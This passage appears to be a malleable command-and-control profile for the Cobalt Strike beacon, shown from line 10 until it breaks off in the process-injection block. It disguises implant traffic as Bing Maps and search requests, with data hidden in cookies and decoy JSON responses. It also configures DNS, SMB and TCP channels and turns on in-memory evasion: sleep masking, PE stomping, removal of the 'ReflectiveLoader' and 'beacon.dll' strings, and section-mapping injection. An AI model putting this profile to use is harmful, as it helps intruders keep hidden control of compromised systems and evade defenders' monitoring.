10 set host_stage "false";
11
12 ###DNS options###
13 set dns_idle "8.8.8.8";
14 set maxdns "245";
15 set dns_sleep "0";
16 set dns_stager_prepend "";
17 set dns_stager_subhost "";
18 set dns_max_txt "252";
19 set dns_ttl "1";
20
21 ###SMB options###
22 set pipename "ntsvcs";
23 set pipename_stager "scerpc";
24 set smb_frame_header "";
25
26 ###TCP options###
27 set tcp_port "8000";
28 set tcp_frame_header "";
29
30 ###SSH BANNER###
31 set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
32
33 ###SSL Options###
34 #https-certificate {
35 # set keystore "domain001.store";
36 # set password "password123";
37 #}
38
39 #code-signer {
40 #set keystore "your_keystore.jks";
41 #set password "your_password";
42 #set alias "server";
43 #}
44
45 ###HTTP-Config Block###
46 #http-config {
47 # set headers "Server, Content-Type";
48 # header "Content-Type" "text/html;charset=UTF-8";
49 # header "Server" "nginx";
50 #
51 # set trust_x_forwarded_for "false";
52 #}
53
54 ###HTTP-GET Block###
55 http-get {
56
57 set uri "/maps/overlaybfpr";
58
59 client {
60
61 header "Host" "www.bing.com";
62 header "Accept" "*/*";
63 header "Accept-Language" "en-US,en;q=0.5";
64 header "Connection" "close";
65
66
67 metadata {
68 base64;
69
70 prepend "_SS=";
71 prepend "SRCHD=AF=NOFORM;";
72 header "Cookie";
73
74 }
75
76 parameter "q" "san%20diego%20ca%20zoo";
77
78 }
79
80 server {
81
82 header "Cache-Control" "public";
83 header "Content-Type" "text/html;charset=utf-8";
84 header "Vary" "Accept-Encoding";
85 header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\"";
86 header "X-MSEdge-Ref" "Ref A: 20D7023F4A1946FEA6E17C00CC8216CF Ref B: DALEDGE0715";
87 header "Connection" "close";
88
89 output {
90
91 base64;
92
93 prepend "{
94 \"_type\": \"Suggestions\",
95 \"instrumentation\": {
96 \"pingUrlBase\": \"https://www.bing.com/api/ping?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&ID=\",
97 \"pageLoadPingUrl\": \"https://www.bing.com/api/ping/pageload?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&Type=Event.CPT&DATA=0\"
98 },
99 \"queryContext\": {
100 \"originalQuery\": \"san diego ca zoo\"
101 },
102 \"value\": [{
103 \"_type\": \"Place\",
104 \"id\": \"sid:\"";
105
106
107
108
109
110 append "\"
111 \"readLink\": \"https://www.bing.com/api/v6/localentities/dbb1c326-5b67-4591-a264-0929e070e5ee\",
112 \"readLinkPingSuffix\": \"DevEx,5018.1\",
113 \"entityPresentationInfo\": {
114 \"entityScenario\": \"ListItem\",
115 \"entitySubTypeHints\": [\"PopulatedPlace\"]
116 },
117 \"geo\": {
118 \"latitude\": 32.7157,
119 \"longitude\": -117.162
120 },
121 \"address\": {
122 \"addressLocality\": \"San Diego\",
123 \"addressSubregion\": \"San Diego County\",
124 \"addressRegion\": \"California\",
125 \"addressCountry\": \"United States\",
126 \"countryIso\": \"US\",
127 \"text\": \"San Diego, California\"
128 },
129 \"formattingRuleId\": \"US\"
130 }, {
131 \"_type\": \"LocalBusiness\",
132 \"id\": \"local_ypid:\"YN873x13020856635161814\"\",
133 \"readLink\": \"https://www.bing.com/api/v6/localbusinesses/YN873x13020856635161814\",
134 \"readLinkPingSuffix\": \"DevEx,5019.1\",
135 \"name\": \"San Diego Zoo\",
136 \"geo\": {
137 \"latitude\": 32.7353,
138 \"longitude\": -117.149
139 },
140 \"address\": {
141 \"streetAddress\": \"2920 Zoo Dr\",
142 \"addressLocality\": \"San Diego\",
143 \"addressRegion\": \"CA\",
144 \"postalCode\": \"92101\",
145 \"addressCountry\": \"United States\",
146 \"countryIso\": \"US\",
147 \"text\": \"2920 Zoo Dr, San Diego, CA 92101\"
148 },
149 \"formattingRuleId\": \"US\",
150 \"categories\": [\"90000.90001.90012.90017\"]
151 }, {
152 \"_type\": \"Place\",
153 \"id\": \"sid:\"63101d85-2568-910b-fee1-2518175b6a48\"\",
154 \"readLink\": \"https://www.bing.com/api/v6/localentities/63101d85-2568-910b-fee1-2518175b6a48\",
155 \"readLinkPingSuffix\": \"DevEx,5020.1\",
156 \"entityPresentationInfo\": {
157 \"entityScenario\": \"ListItem\",
158 \"entitySubTypeHints\": [\"PopulatedPlace\"]
159 },
160 \"geo\": {
161 \"latitude\": 10.2573,
162 \"longitude\": -67.9548
163 },
164 \"address\": {
165 \"addressLocality\": \"San Diego\",
166 \"addressRegion\": \"Carabobo\",
167 \"addressCountry\": \"Venezuela\",
168 \"countryIso\": \"VE\",
169 \"text\": \"San Diego, Carabobo\"
170 }";
171
172
173 print;
174 }
175 }
176 }
177
178
179
180 ###HTTP-Post Block###
181 http-post {
182
183 set uri "/fd/ls/lsp.aspx";
184 #set verb "GET";
185 set verb "POST";
186
187 client {
188
189 header "Host" "www.bing.com";
190 header "Accept" "*/*";
191 header "Accept-Language" "en-US";
192 header "Content-Type" "text/xml";
193 header "Connection" "close";
194
195 output {
196 base64url;
197
198 prepend "SRCHUID=";
199 prepend "SRCHD=AF=NOFORM;";
200 header "Cookie";
201 }
202
203 id {
204 base64url;
205 parameter "lid";
206
207 }
208 }
209
210 server {
211
212 header "Cache-Control" "public, max-age=31536000";
213 header "Content-Type" "application/json";
214 header "Vary" "Accept-Encoding";
215 header "X-Cache" "TCO_HIT";
216 header "Server" "Microsoft-IIS/10.0";
217 header "X-AspNet-Version" "4.0.30319";
218 header "X-Powered-By" "ASP.NET";
219
220 output {
221 netbios;
222
223 prepend "{
224 \"categoryMap\": [
225 {
226 \"categoryId\": 91263,
227 \"bucketId\": 1848,
228 \"entry\": \"CommunityPoint\"
229 },
230 {
231 \"categoryId\": 90892,
232 \"bucketId\": 1899,
233 \"entry\": \"Transit\"
234 },
235 {
236 \"categoryId\": 90014,
237 \"bucketId\": 300,
238 \"entry\": \"ZXlJeE5DSTZleUoyWldOMGIzSkpiV0ZuWlNJNmV5SnlaV052Y21SeklqcGJleUp6WTJGc1pWQmhiR1YwZEdWTFpYbEpaQ0k2TFRFc0luTm9ZWEJsVUdGc1pYUjBaVXRsZVVsa0lqb3RNU3dpWjJWdmJXVjBjbmxUZEhKcGJtY2lPaUpOTWk0Mk56Z3NNVEJvTFRVdU16VTFWall1TlROb0xUTXVNalFnSUdNdE1DNDVPREVzTUM0d01qSXRNUzQzTlMwd0xqTTVOQzB5TGpFNE1TMHhMakE1TW1NdE1DNHpNamN0TUM0MU16TXRNQzQxT0RNdE1TNDBORElzTUM0d056SXRNaTQzTld3d0xqRXpOeTB3TGpJek1Xd3hMalU0T1MweUxqSXlNaUFnWXkwd0xqSTFOUzB3TGpFNE15MHdMalEyTmkwd0xqUXhPQzB3TGpZeE9TMHdMamN3TVdNdE1DNDBOREV0TUM0NE1Ua3RNQzR6TFRFdU56ZzJMREF1TkRFNExUSXVPRGN6YkRFdU5qTTVMVEl1TXpJell5MHdMakF6TXkwd0xqQTBOaTB3TGpBMkxUQXVNRGc1TFRBdU1EZzBMVEF1TVRNZ0lHTXRNQzR5TlMwd0xqUXlNeTB3TGpVM01TMHhMak14TlN3d0xqQTVPUzB5TGpVek4yd3lMamN6T0MwMExqRTVPRU10TVM0M05TMHhNeTR5TnkweExqQXlPQzB4TkN3d0xqQXhPQzB4TkdNd0xqWXdPU3d3TERFdU5EYzRMREF1TWpVMExESXVNVFU0TERFdU5EVTViREl1T0RFM0xEUXVPRGNnSUdNd0xqRXhOU3d3TGpRNE1pd3dMakE1TXl3eExqRTNPUzB3TGpJNE1Td3hMamM1T0d3eExqZzBOU3d5TGpZek0yTXdMalExT1N3d0xqY3pOU3d3TGpjd09Dd3hMamMyTWl3d0xqRTVOU3d5TGpZNE0wTTJMall4Tmkwd0xqTXhNeXcyTGpReE1pMHdMakExTVN3MkxqRXdPU3d3TGpFM01pQWdiREl1TURFekxESXVOemMwUXpndU5EUTFMRE11TlRjeExEZ3VOakU0TERRdU5UUXNPQzR4TWpZc05TNHpOemhqTFRBdU1qUXpMREF1TkRFekxUQXVPRFExTERFdU1URXpMVEl1TVRVc01TNHhOVFJJTWk0Mk56aFdNVEI2SWl3aVptbHNiRlpoYkhWbFNXUWlPakkwTENKemRISnZhMlZXWVd4MVpVbGtJam94TENKemRISnZhMlZYYVdSMGFDSTZNU3dpYzNSeWIydGxVMk5oYkdWUVlXeGxkSFJsUzJWNVNXUWlPaTB4TENKeVpXTnZjbVJVZVhCbElqb2lVR0YwYUNKOQ==\"
239 },
240 {
241 \"categoryId\": 90595,
242 \"bucketId\": 311,
243 \"entry\": \"RealEstatePoint\"
244 },
245 {
246 \"categoryId\": 91616,
247 \"bucketId\": 257,
248 \"entry\": \"AquariumPoint\"
249 },
250 {
251 \"categoryId\": 90954,
252 \"bucketId\": 277,
253 \"entry\": \"ArtGalleryPoint\"
254 },
255 {
256 \"categoryId\": 90001,
257 \"bucketId\": 258,
258 \"entry\": \"UEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHTnliM056YjNKcFoybHVQU0poYm05dWVXMXZkWE1pSUhOeVl6MGlMM0p3TDBScWNrUjZOMU5ZYlhOMWRYZHhRMlI1WldsdlFsWXpPWGhKV1M1bmVpNXFjeUkrUEM5elkzSnBjSFErUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaVBnPT0=\"
259 },
260 {
261 \"categoryId\": 90133,
262 \"bucketId\": 278,
263 \"entry\": \"ATMPoint\"
264 },
265 {
266 \"categoryId\": 90078,
267 \"bucketId\": 330,
268 \"entry\": \"AutomobileRepairPoint\"
269 },
270 {
271 \"categoryId\": 91186,
272 \"bucketId\": 327,
273 \"entry\": \"FoodPoint\"
274 },
275 {
276 \"categoryId\": 90122,
277 \"bucketId\": 279,
278 \"entry\": \"BankPoint\"
279 },
280 {
281 \"categoryId\": 90243,
282 \"bucketId\": 284,
283 \"entry\": \"BarPoint\"
284 },
285 {
286 \"categoryId\": 91204,
287 \"bucketId\": 308,
288 \"entry\": \"BarAndGrillPoint\"
289 },
290 {
291 \"categoryId\": 91576,
292 \"bucketId\": 1851,
293 \"entry\": \"AttractionPoint\"
294 },
295 {
296 \"categoryId\": 90353,
297 \"bucketId\": 1972,
298 \"entry\": \"ZXlKelkyRnNaVkJoYkdWMGRHVkxaWGxKWkNJNkxURXNJbk5vWVhCbFVHRnNaWFIwWlV0bGVVbGtJam90TVN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTkxUSXVNalUwTFRZdU16ZzNZekFzTUMweExqZzJPU3d3TGpNd015MHhMakE0T1MweExqRXhPR3d5TGpjME1TMDBMakU1TTJNd0xEQXNNQzQxTkMweExqTXlMREV1TWpnMExEQnNNaTQyTkRNc05DNDBNeUFnWXpBc01Dd3dMakl5TVN3d0xqa3hOQzB4TGpBMk9Dd3dMamc0TVd3eUxqZzVOQ3cwTGpFek1XTXdMREFzTUM0M056TXNNUzR5TlMwd0xqazFNU3d4TGpJMVNETXVNVEUzYkRNdU5EZ3lMRFF1TnpReVl6QXNNQ3d3TGpVME1pd3hMakEwTkMwd0xqWTNOU3d4TGpBNE1rZ3dMamsyTkhZekxqUTJPQ0FnYUMweExqa3lOM1l0TXk0ME4yZ3ROQzQ1TlRSak1Dd3dMVEV1TXpJc01DNHhNamN0TUM0MU56WXRNUzR6TmpGc015NHlNelV0TkM0MU1qWm9MVEV1TlRjM1l6QXNNQzB4TGpJeE55d3dMakUyTlMwd0xqSXpOUzB4TGpNeU0wd3RNaTR5TlRRdE5pNHpPRGNpTENKbWFXeHNWbUZzZFdWSlpDSTZNalVzSW5OMGNtOXJaVlpoYkhWbFNXUWlPakVzSW5OMGNtOXJaVmRwWkhSb0lqb3hMQ0p6ZEhKdmEyVlRZMkZzWlZCaGJHVjBkR1ZMWlhsSlpDSTZMVEVzSW5KbFkyOXlaRlI1Y0dVaU9pSlFZWFJvSW4wPQ==\"
299 },
300 {
301 \"categoryId\": 90940,
302 \"bucketId\": 329,
303 \"entry\": \"MarinaPoint\"
304 },
305 {
306 \"categoryId\": 90650,
307 \"bucketId\": 1365,
308 \"entry\": \"BookstorePoint\"
309 },
310 {
311 \"categoryId\": 91533,
312 \"bucketId\": 271,
313 \"entry\": \"BowlingPoint\"
314 },
315 {
316 \"categoryId\": 91647,
317 \"bucketId\": 1382,
318 \"entry\": \"ZXlJeU1EWWlPbnNpZG1WamRHOXlTVzFoWjJVaU9uc2ljbVZqYjNKa2N5STZXM3NpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pFNU9Td2ljMmhoY0dWUVlXeGxkSFJsUzJWNVNXUWlPakl3TUN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTk1USXVOUzA1YUMweU5TNHhZeTB4TGpjc01DMHpMakVzTVM0MExUTXVNU3d6TGpGV05TNDVZekFzTVM0M0xERXVOQ3d6TGpFc015NHhMRE11TVdneU5TNHhJQ0FnWXpFdU55d3dMRE11TVMweExqUXNNeTR4TFRNdU1WWXROUzQ1UXpFMUxqWXROeTQyTERFMExqSXRPU3d4TWk0MUxUbDZJQ0lzSW1acGJHeFdZV3gxWlVsa0lqb3lNU3dpYzNSeWIydGxWbUZzZFdWSlpDSTZNU3dpYzNSeWIydGxWMmxrZEdnaU9qRXNJbk4wY205clpWTmpZV3hsVUdGc1pYUjBaVXRsZVVsa0lqb3RNU3dpY21WamIzSmtWSGx3WlNJNklsQmhkR2dpZlE9PQ\"
319 },
320 {
321 \"categoryId\": 255,
322 \"bucketId\": 254,
323 \"entry\": \"Transit\"
324 },
325 {
326 \"categoryId\": 257,
327 \"bucketId\": 253,
328 \"entry\": \"Transit\"
329 },
330 {
331 \"categoryId\": 264,
332 \"bucketId\": 243,
333 \"entry\": \"Transit\"
334 },
335 {
336 \"categoryId\": 263,
337 \"bucketId\": 241,
338 \"entry\":";
339
340
341
342
343
344 append " },
345 {
346 \"categoryId\": 266,
347 \"bucketId\": 236,
348 \"entry\": \"Transit\"
349 },
350 {
351 \"categoryId\": 251,
352 \"bucketId\": 252,
353 \"entry\": \"Transit\"
354 },
355 {
356 \"categoryId\": 265,
357 \"bucketId\": 242,
358 \"entry\": \"Transit\"
359 },
360 {
361 \"categoryId\": 253,
362 \"bucketId\": 251,
363 \"entry\": \"Transit\"
364 },
365 {
366 \"categoryId\": 254,
367 \"bucketId\": 250,
368 \"entry\": \"ZXlJek1DSTZleUoyWldOMGIzSkpiV0ZuWlNJNmV5SnlaV052Y21SeklqcGJleUp6WTJGc1pWQmhiR1YwZEdWTFpYbEpaQ0k2TkRJNUxDSnphR0Z3WlZCaGJHVjBkR1ZMWlhsSlpDSTZORE13TENKblpXOXRaWFJ5ZVZOMGNtbHVaeUk2SWsweE15MHdMakF4TkRZeE1ESTVZekFzTWk0eE9UZ3RNU3cwTGpFek1TMHlMalV4TWl3MUxqSTRNVU0zTGpjeU5pdzNMakUzTWpNNUxETXVOelUwTERjdU9UZzFNemtzTUN3M0xqazROVE01Y3kwM0xqY3lOaTB3TGpneE15MHhNQzQwT0RndE1pNDNNVGxETFRFeUxEUXVNVEUyTXprdE1UTXNNaTR4T0RNek9TMHhNeTB3TGpBeE5EWXhNREk1WXpBdE1pNHhPVGNzTVMwMExqRXpNaXd5TGpVeE1pMDFMakk0TVVNdE55NDNNall0Tnk0eU1EQTJNUzB6TGpjMU5DMDRMakF4TkRZeExEQXRPQzR3TVRRMk1YTTNMamN5Tml3d0xqZ3hOQ3d4TUM0ME9EZ3NNaTQzTVRrZ0lFTXhNaTAwTGpFME5qWXhMREV6TFRJdU1qRXhOakVzTVRNdE1DNHdNVFEyTVRBeU9Yb2lMQ0ptYVd4c1ZtRnNkV1ZKWkNJNk5URXNJbk4wY205clpWWmhiSFZsU1dRaU9qVXlMQ0p6ZEhKdmEyVlhhV1IwYUNJNk1Td2ljM1J5YjJ0bFUyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9pMHhMQ0p5WldOdmNtUlVlWEJsSWpvaVVHRjBhQ0o5TEhzaWMyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9qUXpNaXdpYzJoaGNHVlFZV3hsZEhSbFMyVjVTV1FpT2pRek15d2liR1ZtZEZSdmNDSTZleUo0SWpvdE9TNHpOekF4TENKNUlqb3RPQzR3T0RNd01EaDlMQ0p5YVdkb2RFSnZkSFJ2YlNJNmV5SjRJam94TUM0ek56QXhNeXdpZVNJNk9DNHdPRE13TURoOUxDSjBaWGgwVTNSNWJHVWlPbnNpWm05dWRFWmhiV2xzZVVsa0lqbzRMQ0ptYjI1MFUybDZaU0k2T1N3aWJXbHVhVzExYlVadmJuUlRhWHBsSWpvNUxDSm9aV2xuYUhSTllYUmphRTF2WkdVaU9qQXNJbWhsYVdkb2RFMWhkR05vVUdsNFpXeHpJam93TENKbWIyNTBVM1I1YkdVaU9qQXNJblJsZUhSRWNtRjNVMlYwZEdsdVozTWlPakFzSW1OdmJHOXlWbUZzZFdWSlpDSTZOVE1zSW1kc2IzZFRhWHBsSWpvekxDSnpaV052Ym1SSGJHOTNVMmw2WlNJNk9Td2lZV3h3YUdGR2JHOXZjaUk2TVRjMUxDSm5iRzkzUTI5c2IzSldZV3gxWlVsa0lqbzNMQ0p2ZFhSc2FXNWxRMjlzYjNKV1lXeDFaVWxrSWpvM0xDSnZkWFJzYVc1bFYybGtkR2dpT2pCOUxDSnpkSEpwYm1kVGIzVnlZMlZKWkNJNk5ETTBMQ0p6ZEhKcGJtZFRiM1Z5WTJWVWVYQmxJam95TENKb2IzSnBlbTl1ZEdGc1FXeHBaMjV0Wlc1MElqb3dMQ0oyWlhKMGFXTmhiRUZzYVdkdWJXVnVkQ0k2TUN3aWFHOXlhWHB2Ym5SaGJFRjFkRzlUWTJGc2FXNW5Jam94TENKMlpYSjBhV05oYkVGMWRHOVRZMkZzYVc1bklqb3hMQ0p5WldOdmNtUlVlWEJsSWpvaVZHVjRkQ0o5WFgxOWZRPT0=\"
369 },
370 {
371 \"categoryId\": 260,
372 \"bucketId\": 229,
373 \"entry\": \"Transit\"
374 },
375 {
376 \"categoryId\": 267,
377 \"bucketId\": 226,
378 \"entry\": \"Transit\"
379 },
380 {
381 \"categoryId\": 252,
382 \"bucketId\": 249,
383 \"entry\": \"Transit\"
384 },
385 {
386 \"categoryId\": 91714,
387 \"bucketId\": 66,
388 \"entry\": \"FinancialPoint\"
389 },
390 {
391 \"categoryId\": 203,
392 \"bucketId\": 248,
393 \"entry\": \"ZXlJek16TWlPbnNpZG1WamRHOXlTVzFoWjJVaU9uc2ljbVZqYjNKa2N5STZXM3NpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pFNU9Td2ljMmhoY0dWUVlXeGxkSFJsUzJWNVNXUWlPakl3TUN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTk5TNDVMVGxJTFRVdU9VTXROeTQyTFRrdE9TMDNMall0T1MwMUxqbFdOUzQ1UXkwNUxEY3VOaTAzTGpZc09TMDFMamtzT1VnMUxqbEROeTQyTERrc09TdzNMallzT1N3MUxqbFdMVFV1T1NBZ0lFTTVMVGN1Tml3M0xqWXRPU3cxTGprdE9VdzFMamt0T1hvZ0lpd2labWxzYkZaaGJIVmxTV1FpT2pJeExDSnpkSEp2YTJWV1lXeDFaVWxrSWpveExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aWMzUnliMnRsVTJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2kweExDSnlaV052Y21SVWVYQmxJam9pVUdGMGFDSjlMSHNpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pJd01pd2ljMmhoY0dWUVlXeGxkSFJsUzJWNVNXUWlPakl3TUN3aVoyVnZiV1YwY25sVGRISnBibWNpT2lKTkxUY3VOeXcxTGpsak1Dd3hMREF1T0N3eExqZ3NNUzQ0TERFdU9FZzFMamxqTVN3d0xERXVPQzB3TGpnc01TNDRMVEV1T0ZZdE5TNDVZekF0TVMwd0xqZ3RNUzQ0TFRFdU9DMHhMamhJTFRVdU9TQWdJQ0JqTFRFc01DMHhMamdzTUM0NExURXVPQ3d4TGpoV05TNDVlaUFnSWl3aVptbHNiRlpoYkhWbFNXUWlPakl5TENKemRISnZhMlZXWVd4MVpVbGtJam94TENKemRISnZhMlZYYVdSMGFDSTZNU3dpYzNSeWIydGxVMk5oYkdWUVlXeGxkSFJsUzJWNVNXUWlPaTB4TENKeVpXTnZjbVJVZVhCbElqb2lVR0YwYUNKOUxIc2ljMk5oYkdWUVlXeGxkSFJsUzJWNVNXUWlPakl3TkN3aWMyaGhjR1ZRWVd4bGRIUmxTMlY1U1dRaU9qSXdOU3dpWjJWdmJXVjBjbmxUZEhKcGJtY2lPaUpOTWk0MUxEWXVNMmd5TGpOTU1pNDJMRE11Tm1Nd0xqWXRNQzR4TERFdE1DNHpMREV0TUM0NFl6QXNNQ3d3TFRJdU1Td3dMakV0TXk0Mll6QXVNUzB4TGpjc01DMHlMaklzTUMweUxqSkRNeTQzTFRNdU55d3pMakl0TkM0eUxESXVOQzAwTGpJZ0lDQm9MVEoyTFRFdU1XZ3lMakYyTFRBdU9XZ3ROUzR6ZGpBdU9XZ3lMakYyTVM0eGFDMHhMamxqTFRBdU9Dd3dMVEV1TWl3d0xqVXRNUzQwTERFdU1tTXdMREFzTUN3d0xqY3NNQ3d5TGpKak1DNHhMREV1Tml3d0xqRXNNeTQxTERBdU1Td3pMalZqTUN3d0xqWXNNQzQxTERBdU9Td3hMakVzTUM0NUlDQWdiQzB5TGpJc01pNDJhREl1TTJ3eExqUXRNaTQyYURJdU1rd3lMalVzTmk0emVpQk5NaTQxTERJdU1XTXdMREF1TkMwd0xqTXNNQzQzTFRBdU55d3dMamRETVM0MExESXVPQ3d4TERJdU5Dd3hMREl1TVhNd0xqTXRNQzQzTERBdU55MHdMamRETWk0eExERXVNeXd5TGpVc01TNDNMREl1TlN3eUxqRjZJQ0FnSUUwdE1pNDBMVEl1TldNd0xUQXVNaXd3TGpJdE1DNDBMREF1TkMwd0xqUm9OR013TGpJc01Dd3dMalFzTUM0eUxEQXVOQ3d3TGpSMk15NHhhQzAwTGpoRExUSXVOQ3d3TGpZdE1pNDBMVEl1TlMweUxqUXRNaTQxZWlCTkxURXVOeXd4TGpORExURXVNeXd4TGpNdE1Td3hMamN0TVN3eUxqRWdJQ0J6TFRBdU15d3dMamN0TUM0M0xEQXVOMk10TUM0MExEQXRNQzQzTFRBdU15MHdMamN0TUM0M1F5MHlMalVzTVM0M0xUSXVNU3d4TGpNdE1TNDNMREV1TTNvZ0lpd2labWxzYkZaaGJIVmxTV1FpT2pJekxDSnpkSEp2YTJWV1lXeDFaVWxrSWpveExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aWMzUnliMnRsVTJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2kweExDSnlaV052Y21SVWVYQmxJam9pVUdGMGFDSjlYWDE5ZlE9PQ==\"
394 },
395 {
396 \"categoryId\": 91754,
397 \"bucketId\": 65,
398 \"entry\": \"Transit\"
399 },
400 {
401 \"categoryId\": 205,
402 \"bucketId\": 247,
403 \"entry\": \"Transit\"
404 },
405 {
406 \"categoryId\": 91649,
407 \"bucketId\": 281,
408 \"entry\": \"CafePoint\"
409 },
410 {
411 \"categoryId\": 91562,
412 \"bucketId\": 1366,
413 \"entry\": \"CampPoint\"
414 },
415 {
416 \"categoryId\": 90977,
417 \"bucketId\": 331,
418 \"entry\": \"\"
419 },
420 {
421 \"categoryId\": 90903,
422 \"bucketId\": 274,
423 \"entry\": \"AutomobileRentalPoint\"
424 },
425 {
426 \"categoryId\": 90024,
427 \"bucketId\": 303,
428 \"entry\": \"CasinoPoint\"
429 },
430 {
431 \"categoryId\": 91622,
432 \"bucketId\": 1839,
433 \"entry\": \"AttractionPoint\"
434 },
435 {
436 \"categoryId\": 91252,
437 \"bucketId\": 1846,
438 \"entry\": \"PalacePoint\"
439 },
440 {
441 \"categoryId\": 90619,
442 \"bucketId\": 1847,
443 \"entry\": \"ZXlJek5qTWlPbnNpZG1WamRHOXlTVzFoWjJVaU9uc2ljbVZqYjNKa2N5STZXM3NpYzJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2pFek5EZ3NJbk5vWVhCbFVHRnNaWFIwWlV0bGVVbGtJam94TXpRNUxDSmpXQ0k2TUN3aVkxa2lPakFzSW5KWUlqb3dMQ0p5V1NJNk1Dd2lZMjlzYjNKV1lXeDFaVWxrSWpveU56Y3NJbXh2WTJ0WFNGSmhkR2x2SWpwMGNuVmxMQ0p5WldOdmNtUlVlWEJsSWpvaVJtbHNiR1ZrUld4c2FYQnpaU0o5TEhzaWMyTmhiR1ZRWVd4bGRIUmxTMlY1U1dRaU9qRXpORGdzSW5Ob1lYQmxVR0ZzWlhSMFpVdGxlVWxrSWpveE16UTVMQ0pqV0NJNk1Dd2lZMWtpT2pBc0luSllJam93TENKeVdTSTZNQ3dpYkdsdVpWTjBlV3hsSWpwN0ltTnZiRzl5Vm1Gc2RXVkpaQ0k2TWpjNExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aVpHRnphR1Z6VEdsemRDSTZXMTBzSW1OdmJYQnZkVzVrUVhKeVlYbE1hWE4wSWpwYlhYMHNJbXh2WTJ0WFNGSmhkR2x2SWpwMGNuVmxMQ0p6ZEhKdmEyVlRZMkZzWlZCaGJHVjBkR1ZMWlhsSlpDSTZNVE0xTVN3aWNtVmpiM0prVkhsd1pTSTZJa1ZzYkdsd2MyVWlmU3g3SW5OallXeGxVR0ZzWlhSMFpVdGxlVWxrSWpveE16VXpMQ0p6YUdGd1pWQmhiR1YwZEdWTFpYbEpaQ0k2TVRNMU5Dd2laMlZ2YldWMGNubFRkSEpwYm1jaU9pSk5OQzQwTFRNdU5tTXdMakl0TUM0eUxEQXVNaTB3TGpVc01DMHdMamRqTFRBdU1pMHdMakl0TUM0MUxUQXVNaTB3TGpjc01Fd3dMamd0TVM0MWFERXVORU15TGpJdE1TNDFMRFF1TkMwekxqWXNOQzQwTFRNdU5ub2dUVFF0TUM0MWFDMDRJQ0JqTFRBdU15d3dMVEF1TlN3d0xqSXRNQzQxTERBdU5XTXdMREl1TlN3eUxEUXVOU3cwTGpVc05DNDFjelF1TlMweUxEUXVOUzAwTGpWRE5DNDFMVEF1TXl3MExqTXRNQzQxTERRdE1DNDFlaUJOTVN3eUxqVklNQzQxVmpOak1Dd3dMak10TUM0eUxEQXVOUzB3TGpVc01DNDFJQ0JUTFRBdU5Td3pMak10TUM0MUxETldNaTQxU0MweFl5MHdMak1zTUMwd0xqVXRNQzR5TFRBdU5TMHdMalZUTFRFdU15d3hMalV0TVN3eExqVm9NQzQxVmpGak1DMHdMak1zTUM0eUxUQXVOU3d3TGpVdE1DNDFVekF1TlN3d0xqY3NNQzQxTERGMk1DNDFTREVnSUdNd0xqTXNNQ3d3TGpVc01DNHlMREF1TlN3d0xqVlRNUzR6TERJdU5Td3hMREl1TlhvaUxDSm1hV3hzVm1Gc2RXVkpaQ0k2TWpjNUxDSnpkSEp2YTJWV1lXeDFaVWxrSWpveExDSnpkSEp2YTJWWGFXUjBhQ0k2TVN3aWMzUnliMnRsVTJOaGJHVlFZV3hsZEhSbFMyVjVTV1FpT2kweExDSnlaV052Y21SVWVYQmxJam9pVUdGMGFDSjlYWDE5ZlE9PQ===\"
444 },
445 {
446 \"categoryId\": 91703,
447 \"bucketId\": 1849,
448 \"entry\": \"CommunityPoint\"
449 },
450 {
451 \"categoryId\": 90386,
452 \"bucketId\": 1367,
453 \"entry\": \"ClinicPoint\"
454 },
455 {
456 \"categoryId\": 90188,
457 \"bucketId\": 295,
458 \"entry\": \"EducationPoint\"
459 },
460 {
461 \"categoryId\": 90584,
462 \"bucketId\": 310,
463 \"entry\": \"CommunityPoint\"
464 }";
465
466 print;
467 }
468 }
469 }
470
471
472
473 ###HTTP-Stager Block###
474 http-stager {
475 set uri_x86 "/maps/overlayBFPR";
476 set uri_x64 "/maps/overlayBfpr";
477
478 client {
479
480 header "Host" "www.bing.com";
481 header "Accept" "*/*";
482 header "Accept-Language" "en-US,en;q=0.5";
483 header "Connection" "close";
484 }
485
486 server {
487
488 header "Cache-Control" "public";
489 header "Content-Type" "text/html;charset=utf-8";
490 header "Vary" "Accept-Encoding";
491 header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\"";
492 header "X-MSEdge-Ref" "Ref A: 20D7023F5A1946FFA6E18C00CC8216CF Ref B: DALEDGE0815";
493 header "Connection" "close";
494
495 output {
496
497 print;
498 }
499 }
500 }
501
502
503 ###Malleable PE/Stage Block###
504 stage {
505 set checksum "0";
506 set compile_time "12 Dec 2019 02:52:11";
507 set entry_point "170000";
508 #set image_size_x86 "6586368";
509 #set image_size_x64 "6586368";
510 #set name "WWanMM.dll";
511 set userwx "false";
512 set cleanup "true";
513 set sleep_mask "true";
514 set stomppe "true";
515 set obfuscate "true";
516 set rich_header "";
517
518 set sleep_mask "true";
519
520 set smartinject "true";
521
522 set module_x86 "wwanmm.dll";
523 set module_x64 "wwanmm.dll";
524
525 transform-x86 {
526 prepend "\x90\x90\x90";
527 strrep "ReflectiveLoader" "";
528 strrep "beacon.dll" "";
529 }
530
531 transform-x64 {
532 prepend "\x90\x90\x90";
533 strrep "ReflectiveLoader" "";
534 strrep "beacon.x64.dll" "";
535 }
536
537 #string "something";
538 #data "something";
539 #stringw "something";
540 }
541
542 ###Process Inject Block###
543 process-inject {
544
545 set allocator "NtMapViewOfSection";
546
547 set min_alloc "16700";
548
